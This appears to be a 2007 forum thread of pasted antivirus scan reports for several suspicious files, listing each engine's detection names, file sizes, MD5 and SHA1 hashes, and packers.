VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 9216 bytes
MD5: b1682db94c7ab7bb53aa90d67df72d42
SHA1: c24da5e473abc41954347b406c9ea84754241c38
packers: UPack
[/QUOTE]
[QUOTE]
Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 BDS/Afcore.cb.2.B
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 -
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 -
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 58880 bytes
MD5: 4b137cb5b8291dc7d71de53299826db5
SHA1: 1a21926475389802039e4943cf2060921c11997a
packers: UPX
[/QUOTE]
-
File _________________________________ received on 07.26.2007 16:57:15
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 -
[B]eTrust-Vet 31.1.5004 2007.07.25 HTML/Mallar[/B]
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
[B]Microsoft 1.2704 2007.07.26 Virus:HTML/Allaple.A[/B]
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
[B]Panda 9.0.0.4 2007.07.26 HTML/Instancob.A[/B]
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -[/QUOTE]
Additional information
File size: 21071 bytes
MD5: 03bfb34583fcd2b913f4bb9be182bc3f
SHA1: a47e0e7bc5ee907faba6a69f4a1cc65f76a8f06d
-
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
[B]Avast 4.7.997.0 2007.07.26 Win32:Spyware-gen.[/B]
AVG 7.5.0.476 2007.07.26 -
[B]BitDefender 7.2 2007.07.26 Application.Cool.Remote.Control.1.2[/B]
CAT-QuickHeal 9.00 2007.07.26 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 -
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5084 2007.07.26 -
[B]Microsoft 1.2704 2007.07.26 RemoteAccess:Win32/CoolRemoteControl[/B]
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
[B]Panda 9.0.0.4 2007.07.26 Generic Malware[/B]
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Webwasher-Gateway 6.5.3 2007.07.26 -
Additional information
File size: 29184 bytes
MD5: 28ff05b83f852ed13bc49f50945651ea
SHA1: 69605f13837c698ca323484fab46bc11146acdb4
-
File 1.scr received on 07.27.2007 16:12:33 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 TR/Crypt.XPACK.Gen[/B]
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.27 -
AVG 7.5.0.476 2007.07.27 -
[B]BitDefender 7.2 2007.07.27 Trojan.PWS.LDPinch.TAW
CAT-QuickHeal 9.00 2007.07.26 (Suspicious) - DNAScan[/B]
ClamAV 0.91 2007.07.27 -
DrWeb 4.33 2007.07.27 -
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.27 -
FileAdvisor 1 2007.07.27 -
Fortinet 2.91.0.0 2007.07.27 -
F-Prot 4.3.2.48 2007.07.27 -
[B]F-Secure 6.70.13030.0 2007.07.27 Packed.Win32.PolyCrypt.b
Ikarus T3.1.1.8 2007.07.27 Trojan-Downloader.Win32.Small.cyn
Kaspersky 4.0.2.24 2007.07.27 Packed.Win32.PolyCrypt.b[/B]
McAfee 5084 2007.07.26 -
[B]Microsoft 1.2704 2007.07.27 Trojan:Win32/Anomaly.gen!A[/B]
NOD32v2 2425 2007.07.27 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.27 -
[B]Rising 19.33.42.00 2007.07.27 Packer.RyCrypt
Sophos 4.19.0 2007.07.26 Mal/Basine-C[/B]
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.27 -
TheHacker 6.1.7.155 2007.07.27 -
VBA32 3.12.2.1 2007.07.27 -
[B]VirusBuster 4.3.26:9 2007.07.27 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.27 Trojan.Crypt.XPACK.Gen[/B]
Additional information
File size: 25743 bytes
MD5: 10561044f4cc7d87c8ca4631ecc23fb7
SHA1: 2a8ff74ff2b208178bd7978969a5e0a6c573104f
-
T-11377
[code] File avz00007.dta received on 07.27.2007 18:36:32 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 HEUR/Crypted[/B]
[B]Authentium 4.93.8 2007.07.27 Possibly a new variant of W32/Threat-HLLSI-based!Maximus[/B]
Avast 4.7.997.0 2007.07.27 -
[B]AVG 7.5.0.476 2007.07.27 PSW.Generic5.KY
BitDefender 7.2 2007.07.27 Trojan.PWS.Goldun.SYT[/B]
CAT-QuickHeal 9.00 2007.07.26 -
ClamAV 0.91 2007.07.27 -
[B]DrWeb 4.33 2007.07.27 Trojan.PWS.GoldSpy
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.27 -
FileAdvisor 1 2007.07.27 -[B]
Fortinet 2.91.0.0 2007.07.27 Dowdec!tr
F-Prot 4.3.2.48 2007.07.27 W32/Threat-HLLSI-based!Maximus
F-Secure 6.70.13030.0 2007.07.27 Trojan-Spy.Win32.Goldun.pc[/B]
[B]Ikarus T3.1.1.8 2007.07.27 Trojan-PWS.Goldun.SYT
Kaspersky 4.0.2.24 2007.07.27 Trojan-Spy.Win32.Goldun.pc[/B]
McAfee 5084 2007.07.26 -
Microsoft 1.2704 2007.07.27 -
NOD32v2 2425 2007.07.27 -
Norman 5.80.02 2007.07.27 -
[B]Panda 9.0.0.4 2007.07.27 Dialer.KMO[/B]
Rising 19.33.42.00 2007.07.27 -
[B]Sophos 4.19.0 2007.07.26 Troj/Dowdec-Gen
Sunbelt 2.2.907.0 2007.07.26 VIPRE.Suspicious[/B]
Symantec 10 2007.07.27 -
TheHacker 6.1.7.155 2007.07.27 -
[B]VBA32 3.12.2.1 2007.07.27 suspected of Downloader.Small.33[/B]
VirusBuster 4.3.26:9 2007.07.27 -
[B]Webwasher-Gateway 6.0.1 2007.07.27 Heuristic.Crypted[/B]
Additional information
File size: 11776 bytes
MD5: 8c9584c8b6606b137ac0bcc2bcf16e0b
SHA1: c60eb19bd704436755f20ab1d6069cafce4050bc
packers: UPX
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.[/code]
-
File loader.exe received on 07.28.2007 14:59:45 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 TR/Dldr.Small.exz[/B]
Authentium 4.93.8 2007.07.27 -
[B]Avast 4.7.997.0 2007.07.27 Win32:Tiny-HD[/B]
[B]AVG 7.5.0.476 2007.07.27 Downloader.Generic5.GEJ[/B]
[B]BitDefender 7.2 2007.07.28 Generic.Malware.dld!!.927334E4[/B]
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.28 -
[B]DrWeb 4.33 2007.07.28 DLOADER.Trojan[/B]
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
[B]eTrust-Vet 31.1.5010 2007.07.28 Win32/Shadown.A[/B]
Ewido 4.0 2007.07.28 -
FileAdvisor 1 2007.07.28 -
[B]Fortinet 2.91.0.0 2007.07.28 Heuri.E[/B]
[B]F-Prot 4.3.2.48 2007.07.27 W32/Downloader-Sml-based!Maximus[/B]
[B]F-Secure 6.70.13030.0 2007.07.27 Trojan-Downloader.Win32.Small.exz[/B]
[B]Ikarus T3.1.1.8 2007.07.28 Win32.SuspectCrc[/B]
[B]Kaspersky 4.0.2.24 2007.07.28 Trojan-Downloader.Win32.Small.exz[/B]
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.28 -
[B]NOD32v2 2426 2007.07.27 probably unknown NewHeur_PE virus[/B]
[B]Norman 5.80.02 2007.07.27 W32/Downloader[/B]
[B]Panda 9.0.0.4 2007.07.28 Generic Malware[/B]
[B]Rising 19.33.52.00 2007.07.28 Trojan.DL.Tiny.ab[/B]
[B]Sophos 4.19.0 2007.07.26 Mal/Heuri-E[/B]
[B]Sunbelt 2.2.907.0 2007.07.28 Trojan-Downloader.Win32.Small.exz[/B]
Symantec 10 2007.07.28 -
[B]TheHacker 6.1.7.155 2007.07.28 Trojan/Downloader.Small.exz[/B]
[B]VBA32 3.12.2.1 2007.07.27 Trojan-Downloader.Win32.Small.exz[/B]
VirusBuster 4.3.26:9 2007.07.27 -
[B]Webwasher-Gateway 6.0.1 2007.07.28 Trojan.Dldr.Small.exz[/B]
Additional information
File size: 1020 bytes
MD5: 06ade3c8d40cd6cd2e0a4f8a3ab8acac
SHA1: f181e447edb61f1cad1fa3fe3492890b382179d0
-
File FG.EXE received on 07.30.2007 07:22:31 (CET)
Current status: finished
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
AntiVir 7.4.0.50 2007.07.30 -
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
BitDefender 7.2 2007.07.30 -
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.30 -
DrWeb 4.33 2007.07.30 -
[B]eSafe 7.0.15.0 2007.07.29 suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5010 2007.07.28 -
Ewido 4.0 2007.07.29 -
FileAdvisor 1 2007.07.30 -
Fortinet 2.91.0.0 2007.07.30 -
F-Prot 4.3.2.48 2007.07.27 -
F-Secure 6.70.13030.0 2007.07.30 -
[B]Ikarus T3.1.1.8 2007.07.29 Backdoor.Win32.Delf.apa[/B]
Kaspersky 4.0.2.24 2007.07.30 -
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.30 -
NOD32v2 2428 2007.07.30 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.29 -
Rising 19.34.00.00 2007.07.30 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.28 -
Symantec 10 2007.07.30 -
TheHacker 6.1.7.158 2007.07.30 -
VBA32 3.12.2.1 2007.07.30 -
VirusBuster 4.3.26:9 2007.07.29 -
[B]Webwasher-Gateway 6.0.1 2007.07.30 Win32.ModifiedUPX.gen!90 (suspicious)[/B]
Additional information
File size: 387584 bytes
MD5: bf32d217b7c5ee975e5a41cb7b9f24d4
SHA1: 7418ff18d07a64f81f0ef259e2cc391ceb062fa7
packers: UPX
-
File sms.exe received on 07.31.2007 07:49:38 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.31.1 2007.07.31 -
[B]AntiVir 7.4.0.54 2007.07.30 HEUR/Crypted[/B]
Authentium 4.93.8 2007.07.30 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
[B]BitDefender 7.2 2007.07.31 Trojan.PWS.LDPinch.TAW[/B]
CAT-QuickHeal 9.00 2007.07.30 -
ClamAV 0.91 2007.07.31 -
DrWeb 4.33 2007.07.31 -
eSafe 7.0.15.0 2007.07.29 -
eTrust-Vet 31.1.5018 2007.07.31 -
Ewido 4.0 2007.07.30 -
FileAdvisor 1 2007.07.31 -
Fortinet 2.91.0.0 2007.07.31 -
F-Prot 4.3.2.48 2007.07.30 -
F-Secure 6.70.13030.0 2007.07.31 -
Ikarus T3.1.1.8 2007.07.31 -
Kaspersky 4.0.2.24 2007.07.31 -
[B]McAfee 5086 2007.07.30 New Malware.ek[/B]
Microsoft 1.2704 2007.07.30 -
NOD32v2 2429 2007.07.30 -
[B]Norman 5.80.02 2007.07.30 Suspicious_P.gen[/B]
Panda 9.0.0.4 2007.07.31 -
Prevx1 V2 2007.07.31 -
Rising 19.34.11.00 2007.07.31 -
[B]Sophos 4.19.0 2007.07.26 Mal/Basine-C
Sunbelt 2.2.907.0 2007.07.31 VIPRE.Suspicious[/B]
Symantec 10 2007.07.31 -
TheHacker 6.1.7.159 2007.07.31 -
VBA32 3.12.2.2 2007.07.30 -
[B]VirusBuster 4.3.26:9 2007.07.30 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.31 Heuristic.Crypted[/B]